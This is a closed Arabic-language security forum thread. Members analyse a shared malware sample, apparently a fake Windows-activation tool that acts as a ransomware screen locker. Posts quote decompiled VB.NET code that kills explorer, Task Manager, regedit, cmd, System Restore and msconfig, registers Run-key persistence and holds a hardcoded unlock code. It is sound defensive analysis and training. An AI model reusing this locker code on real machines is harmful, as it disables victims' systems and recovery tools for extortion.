الحالة
مغلق و غير مفتوح للمزيد من الردود.

black007

إداري سابق وداعم للمنتدى (خبير فحص ملفات)
داعــــم للمنتـــــدى
★★ نجم المنتدى ★★
عضوية موثوقة ✔️
كبار الشخصيات
إنضم
17 يونيو 2013
المشاركات
4,600
مستوى التفاعل
24,183
النقاط
2,970
الإقامة
Egypt
غير متصل
بسم الله

السلام عليكم ورحمه الله وبركاته

فى سبيل زياده الوعى الامنى وتحفيز قدرات التحليل لدى الاعضاء

تقرر نشر عينات يستحق النظر اليها من قبلى للتحليل و ليس الفحص

لزياده المناقشه بين الاعضاء ووضع البرامج تحت الاختبارات القاسيه

العينات التى ستطرح ليست من برمجتى لذلك يرجى توخى كافه الاحتياطات اللزمه عند التحليل

المطلوب هو المشاركه بفاعليه فى هذه النوع من التحليلات ( لا يشترط التجربه على اليدوى او الحقيقى )

الغرض هنا زياده قدرات التحليل والاعتماد على النفس فى تحليل العينات المطروحه

هل هى خبيثه ام حميه

ايضا كل من سيشارك يقوم بشرح تحليله الخاص للملف من خلال برنامجه

ويعطى رائيه بخصوص سلوكيات الملف

لتحميل العينه

[hide]
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
[/hide]

باس فك الضغط

infected

بالتوفيق للجميع
 

توقيع : black007
عند فك الضغط اكتشفه النورتون مباشرة وهو عبارة عن فيروس يحقن نفسه بمكان اخر او يصيب برنامج اخر


i_f49be3c0b22.png



عملت استعادة وتشغيل وهنا ظهرت قوة هذا الفيروس ........فقد ظهر على شكل برنامج لتفعيل مفاتيح ويندوز او شيء من هذا القبيل:222D...... وقد اوقف شريط المهام وسطح المكتب كليا وابقى فقط على المتصفحات شغالة وفعلا النورتون اختفى نهائيا وقائمة ابدأ وحاولت اشغل مدير المهام عن طريق Alt-Ctrl. -Delete وما نجحت ....بالاخير اضطريت اعيد تشغيل الكومبيوتر يدوي ........... طبعا الحمدلله التجرية على الوهمي ............... العينة خطيرة جداً ... ولو انها مشفرة على النورتون لكانت كارثة .....للاسف لم اتمكن من اخذ الصورة بعد التشغيل لان برنامج التصوير توقف عن العمل ايضا




 
شكله لذيذ

لا تشغيل لذك لا Dump

جاري فصفصته
 
توقيع : MagicianMiDo32
إنشاء ستارت أب من الريجستري


SOFTWARE\Microsoft\Windows\CurrentVersion\Run



قتل عمليات النظام الرئيسية




[hide]



كود:
Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs)
    Try
        Process.GetProcessesByName("explorer")(0).Kill
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
        Dim exception As Exception = exception1
        ProjectData.ClearProjectError
    End Try
    Dim process As Process
    For Each process In Process.GetProcesses
        If (process.ProcessName = "cmd") Then
            process.Kill
            Exit For
        End If
        If (process.ProcessName = "taskmgr") Then
            process.Kill
            Exit For
        End If
        If (process.ProcessName = "regedit") Then
            process.Kill
            Exit For
        End If
        If (process.ProcessName = "rstrui") Then
            process.Kill
            Exit For
        End If
        If (process.ProcessName = "msconfig") Then
            process.Kill
            Exit For
        End If
    Next
End Sub
[/hide]​


موقع الحصول على باسوورد الفك


[hide]


يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]



إجراء الفك عن طريق الباسوورد





[hide]
كود:
Private Sub Button2_Click(ByVal sender As Object, ByVal e As EventArgs)
    If (((Me.TextBox1.Text = "710") And (Me.TextBox2.Text = "313")) And (Me.TextBox3.Text = "5284")) Then
        MessageBox.Show("Windows Key Activiated!")
        Try
            Process.Start("explorer")
        Catch exception1 As Exception
            ProjectData.SetProjectError(exception1)
            Dim exception As Exception = exception1
            ProjectData.ClearProjectError
        End Try
        Dim name As String = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        MyProject.Computer.Registry.CurrentUser.OpenSubKey(name, True).DeleteValue("mshost")
        MyProject.Forms.Form1.Close
    Else
        MessageBox.Show("Invalid Key!")
    End If
End Sub


[/hide]​



وشكرا لك أخي بلاك
 
توقيع : MagicianMiDo32
بما اني مبتدي في الفحص وما عندي الخبرة فيه
كنت ابحمل العينه وابجرب وابتعلم فيها لكن من شفت رد اخونا
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
بلعت العافية وتعوذت من ابليس:222D
لسه بدري ع الشغلات هذي
 
توقيع : النــاريــ
عند فك الضغط اكتشفه النورتون مباشرة وهو عبارة عن فيروس يحقن نفسه بمكان اخر او يصيب برنامج اخر


i_f49be3c0b22.png



عملت استعادة وتشغيل وهنا ظهرت قوة هذا الفيروس ........فقد ظهر على شكل برنامج لتفعيل مفاتيح ويندوز او شيء من هذا القبيل:222D...... وقد اوقف شريط المهام وسطح المكتب كليا وابقى فقط على المتصفحات شغالة وفعلا النورتون اختفى نهائيا وقائمة ابدأ وحاولت اشغل مدير المهام عن طريق Alt-Ctrl. -Delete وما نجحت ....بالاخير اضطريت اعيد تشغيل الكومبيوتر يدوي ........... طبعا الحمدلله التجرية على الوهمي ............... العينة خطيرة جداً ... ولو انها مشفرة على النورتون لكانت كارثة .....للاسف لم اتمكن من اخذ الصورة بعد التشغيل لان برنامج التصوير توقف عن العمل ايضا





الملف ليس فايرس اخى وانما هو من نوع ransomware locker يعنى يقوم باغلاق الشاشه لديك لكى تقوم بالدفع الى الشخص الصانع حتى يفتح لك الجهاز
ولكن كما حلله الاخ ميدو كما ذكر

الملف يقوم بقتل العمليات الاساسيه للنظام وهذا سلوك مشبوه لملف

+

يحولك الى رابط كى تطلب منه الباس لفتح الجهاز

وايضا اضاف شرط للملف ووضع الباس بداخله ولن يصل له احد غير بالتحليل كما فعل الاخ ميدو


إنشاء ستارت أب من الريجستري


SOFTWARE\Microsoft\Windows\CurrentVersion\Run



قتل عمليات النظام الرئيسية




[hide]



كود:
Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs)
    Try
        Process.GetProcessesByName("explorer")(0).Kill
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
        Dim exception As Exception = exception1
        ProjectData.ClearProjectError
    End Try
    Dim process As Process
    For Each process In Process.GetProcesses
        If (process.ProcessName = "cmd") Then
            process.Kill
            Exit For
        End If
        If (process.ProcessName = "taskmgr") Then
            process.Kill
            Exit For
        End If
        If (process.ProcessName = "regedit") Then
            process.Kill
            Exit For
        End If
        If (process.ProcessName = "rstrui") Then
            process.Kill
            Exit For
        End If
        If (process.ProcessName = "msconfig") Then
            process.Kill
            Exit For
        End If
    Next
End Sub
[/hide]​


موقع الحصول على باسوورد الفك


[hide]


يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]



إجراء الفك عن طريق الباسوورد





[hide]
كود:
Private Sub Button2_Click(ByVal sender As Object, ByVal e As EventArgs)
    If (((Me.TextBox1.Text = "710") And (Me.TextBox2.Text = "313")) And (Me.TextBox3.Text = "5284")) Then
        MessageBox.Show("Windows Key Activiated!")
        Try
            Process.Start("explorer")
        Catch exception1 As Exception
            ProjectData.SetProjectError(exception1)
            Dim exception As Exception = exception1
            ProjectData.ClearProjectError
        End Try
        Dim name As String = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        MyProject.Computer.Registry.CurrentUser.OpenSubKey(name, True).DeleteValue("mshost")
        MyProject.Forms.Form1.Close
    Else
        MessageBox.Show("Invalid Key!")
    End If
End Sub


[/hide]​



وشكرا لك أخي بلاك

احسنت ياميدو شغل عالى

المشكله انى الملف مكنش متشفر

اذا كان الملف مشفر كنا الموضوع كان افضل

اوعدك هيبقه فى عينات من دى كتير على حسب القنص وحسب اللغه البرمجيه ;222);222);222);222)

بما اني مبتدي في الفحص وما عندي الخبرة فيه
كنت ابحمل العينه وابجرب وابتعلم فيها لكن من شفت رد اخونا
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
بلعت العافية وتعوذت من ابليس:222D
لسه بدري ع الشغلات هذي

تابع هذه المواضيع اخى ستتعلم منها الكثير

المشكله ان اغلب الاعضاء يخاف التجربه وهذه هى المشكله

نعم اللوم ليس عليك لانك لا تعرف ماذا تفعل وتحتاج الى خبره

لكن يمكنك التجربه على جهاز وهمى

الفكره كلها حتى تتعلم وتستفيد وتفحص الملفات المختلفه التى تحملها من الانترنت بنفسك
 
توقيع : black007
وعليكم السلام ورحمة الله وبركاته

جزاك الله كل خير أخي مصطفى على طرح العينات

222:):giggle:
 
توقيع : ALI 145
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى